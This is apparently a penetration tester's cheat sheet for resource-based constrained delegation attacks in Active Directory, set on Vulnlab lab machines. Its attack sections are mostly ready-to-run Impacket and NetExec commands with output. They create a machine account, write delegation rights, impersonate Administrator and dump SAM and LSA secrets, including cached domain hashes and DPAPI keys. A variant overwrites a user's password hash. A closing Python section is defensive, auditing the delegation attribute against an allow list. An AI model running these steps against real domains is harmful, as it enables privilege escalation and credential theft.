# RBCD

## Enumerate MachineAccountQuota

```console
➜ nxc ldap DC01.push.vl -u kelly.hill -p '<REDACTED>' -M maq
SMB         10.10.217.5     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
LDAP        10.10.217.5     389    DC01             [+] push.vl\kelly.hill:<REDACTED>
MAQ         10.10.217.5     389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.217.5     389    DC01             MachineAccountQuota: 10
```
## Create a new machine account

```console
➜ addcomputer.py -computer-name 'MEOW$' -computer-pass 'Summer2024!' -dc-host push.vl -domain-netbios push.vl push.vl/kelly.hill:'<REDACTED>'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Successfully added machine account MEOW$ with password Summer2024!.
```
## Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute

```console
➜ rbcd.py -delegate-to 'MS01$' -dc-ip 10.10.217.5 -action 'read' 'push.vl/kelly.hill:<REDACTED>'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
```
## Write the attribute

```console
➜ rbcd.py -delegate-from 'MEOW$' -delegate-to 'MS01$' -dc-ip 10.10.217.5 -action 'write' 'push.vl/kelly.hill:<REDACTED>'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MEOW$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MEOW$        (S-1-5-21-1451457175-172047642-1427519037-3602)
```
## Obtain a ticket

```console
➜ getST.py -spn 'cifs/MS01.push.vl' -impersonate Administrator -dc-ip 10.10.217.5 'push.vl/MEOW$:Summer2024!'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
```
## Pass the ticket

```console
➜ export KRB5CCNAME=Administrator.ccache
```

```console
➜ secretsdump.py MS01.push.vl -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
...
```
## Using NetExec

Alternatively, NetExec's `--delegate` flag automates the same steps (TGT, S4U2self, S4U2proxy and pass-the-ticket) in one run:

```console
➜ nxc smb 10.10.217.5 -u meow$ -p 'Summer2024!' --delegate Administrator --lsa --sam
SMB         10.10.217.5     445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:push.vl) (signing:False) (SMBv1:False)
SMB         10.10.217.5     445    MS01             [+] push.vl\Administrator through S4U with meow$ (Pwn3d!)
SMB         10.10.217.5     445    MS01             [*] Dumping SAM hashes
SMB         10.10.217.5     445    MS01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
SMB         10.10.217.5     445    MS01             Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
SMB         10.10.217.5     445    MS01             DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
SMB         10.10.217.5     445    MS01             WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
SMB         10.10.217.5     445    MS01             [+] Added 4 SAM hashes to the database
SMB         10.10.217.5     445    MS01             [+] Dumping LSA secrets
SMB         10.10.217.5     445    MS01             PUSH.VL/Administrator:$DCC2$10240#Administrator#3347d36e92ac0b3c7f9c9fff05083e09: (2023-08-31 18:27:31+00:00)
SMB         10.10.217.5     445    MS01             PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b084064849c9a1acba2fd9d4e60d6029: (2023-09-02 11:17:04+00:00)
SMB         10.10.217.5     445    MS01             PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c59b319594744abea7f2db17a2fa65c: (2023-08-31 10:26:08+00:00)
SMB         10.10.217.5     445    MS01             PUSH\MS01$:plain_password_hex:57003e0053007a00640034007200630056004d004b002a0044003a0047004100200052006f006400550058005e007700360033005a0060007000770071006b002d002a0062006e003a0057004e00560025004b002900310021004800300071005c0047006e004d00270048006d00380020005b003000290063004e0057003f00560075003d0031004200290041006000680059002b0033003e004900450024002e0020004e00480067005d007a003f0049005400650030003f006b006900580020003100790034002400790021003c002500360079006d004a0033003600370067002f002700520054003c005b005300
SMB         10.10.217.5     445    MS01             PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:ab0442bf644de37c88190ad56cb6e59f:::
SMB         10.10.217.5     445    MS01             (Unknown User):<REDACTED>
SMB         10.10.217.5     445    MS01             dpapi_machinekey:0x83f7bbd4976dba3418fe397e76d9690c06ee3691 dpapi_userkey:0xe2af091346d181301ff638320e3246e49b9b637c
SMB         10.10.217.5     445    MS01             NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
SMB         10.10.217.5     445    MS01             [+] Dumped 8 LSA secrets to /home/serioton/.nxc/logs/MS01_10.10.217.5_2025-02-13_192354.secrets and /home/serioton/.nxc/logs/MS01_10.10.217.5_2025-02-13_192354.cached
```
## SPN-less RBCD

RBCD is still possible when the MachineAccountQuota is 0, i.e. when no new machine account can be created: a controlled user account without an SPN is used instead of a machine account.

```console
➜ nxc ldap phantom.vl -u svc_sspr -p '<REDACTED>' -M maq
SMB         10.10.123.78    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        10.10.123.78    389    DC               [+] phantom.vl\svc_sspr:<REDACTED>
MAQ         10.10.123.78    389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.123.78    389    DC               MachineAccountQuota: 0
```
### Normal RBCD

The attribute write is the same as in the normal RBCD flow, except that the `-delegate-from` option receives a normal user account instead of a machine account:

```console
➜ rbcd.py -delegate-from 'wsilva' -delegate-to 'DC$' -dc-ip '10.10.123.78' -action 'write' 'phantom.vl'/'wsilva':'P@ssw0rd'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] wsilva can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     wsilva       (S-1-5-21-4029599044-1972224926-2225194048-1114)
```
### Obtain a TGT through overpass-the-hash to use RC4

The TGT is requested with the account's NT hash so that the resulting session key is an RC4 key, i.e. 16 bytes, the same size as an NT hash:

```console
➜ getTGT.py -hashes :$(pypykatz crypto nt 'P@ssw0rd') 'phantom.vl'/'wsilva'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Saving ticket in wsilva.ccache
```

```console
➜ export KRB5CCNAME=wsilva.ccache
```
### Obtain the TGT session key

```console
➜ describeTicket.py wsilva.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : e826a54fce399da484eae4b39c3bc72a
```
### Set the NT hash of the controlled SPN-less account to the TGT session key

This overwrites the account's password: the original password no longer works afterwards, and the change shows up as a password change on that account.

```console
➜ smbpasswd.py -newhashes :e826a54fce399da484eae4b39c3bc72a 'phantom.vl'/'wsilva':'P@ssw0rd'@'DC.phantom.vl'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] NTLM hashes were changed successfully.
```
### Obtain the delegated service ticket through S4U2self+U2U, followed by S4U2proxy

```console
➜ getST.py -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/DC.phantom.vl" 'phantom.vl'/'wsilva'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Impersonating Administrator
[*]     Requesting S4U2self+U2U
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
```
### Pass the ticket

```console
➜ export KRB5CCNAME=Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
```

```console
➜ secretsdump.py DC.phantom.vl -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
....
```
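Defensive counterpart to the two attribute writes above (MEOW$ on MS01$ and wsilva on DC$), added here as an example; it is not part of the original notes and not Impacket or NetExec code. The value rbcd.py stores in msDS-AllowedToActOnBehalfOfOtherIdentity is a self-relative binary security descriptor whose DACL ACEs name the principals allowed to delegate, so an audit that reads that attribute from every computer object (the LDAP read itself is not shown) has to decode it and compare the SIDs with an allow list. The descriptor builder only fabricates sample data for offline use; the access mask 0x000F01FF, the ACL revision and the allow lists are assumed values, and the two SIDs are the ones printed by the writes above.

```python
import struct

# Layout constants from the Windows security descriptor format (MS-DTYP):
# self-relative SD header, ACL header, ACCESS_ALLOWED_ACE.
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
SD_HEADER = "<BBHIIII"   # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
ACL_HEADER = "<BBHHH"    # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBH"      # AceType, AceFlags, AceSize


def sid_to_bytes(sid: str) -> bytes:
    """Encode a textual SID (S-1-5-21-...) into its binary form."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")            # IdentifierAuthority is big-endian
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf: bytes, off: int) -> str:
    """Decode the binary SID found at offset off back to its textual form."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def build_rbcd_descriptor(sids, mask=0x000F01FF) -> bytes:
    """Fabricate a self-relative SD with one ACCESS_ALLOWED_ACE per SID (sample data only;
    mask and ACL revision are assumed values, not taken from any tool)."""
    aces = b""
    for sid in sids:
        sid_b = sid_to_bytes(sid)
        ace_size = struct.calcsize(ACE_HEADER) + 4 + len(sid_b)   # header + Mask + Sid
        aces += struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0, ace_size)
        aces += struct.pack("<I", mask) + sid_b
    acl = struct.pack(ACL_HEADER, 4, 0, struct.calcsize(ACL_HEADER) + len(aces), len(sids), 0) + aces
    header_len = struct.calcsize(SD_HEADER)
    # Owner, group and SACL offsets are 0 (absent); the DACL starts right after the header.
    header = struct.pack(SD_HEADER, 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, header_len)
    return header + acl


def allowed_to_act_sids(sd: bytes):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    if not sd:
        return []                      # attribute absent or empty: nobody may delegate
    _, _, control, _, _, _, off_dacl = struct.unpack_from(SD_HEADER, sd, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, sd, off_dacl)
    pos = off_dacl + struct.calcsize(ACL_HEADER)
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from(ACE_HEADER, sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            # The 4-byte Mask follows the ACE header, then the SID.
            sids.append(bytes_to_sid(sd, pos + struct.calcsize(ACE_HEADER) + 4))
        pos += ace_size                # AceSize covers header, mask and SID
    return sids


def unexpected_delegators(sd: bytes, allowlist):
    """Audit helper: SIDs present in the DACL that are not on the allow list."""
    return [s for s in allowed_to_act_sids(sd) if s not in allowlist]


if __name__ == "__main__":
    # Constructed sample: the two principals written in the notes above.
    sample = build_rbcd_descriptor(["S-1-5-21-1451457175-172047642-1427519037-3602",   # MEOW$
                                    "S-1-5-21-4029599044-1972224926-2225194048-1114"])  # wsilva
    print(allowed_to_act_sids(sample))
    print(unexpected_delegators(sample, allowlist=set()))
```

In a real audit, `allowed_to_act_sids` is fed the raw attribute bytes from each computer object and any SID not on the allow list is reported together with the computer name; an empty or missing attribute, as in the two `-action 'read'` results above, yields an empty list.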
## Resources

Vulnlab Machines/Chains:

- Phantom
- Heron
- Push
- Reflection
- Bruno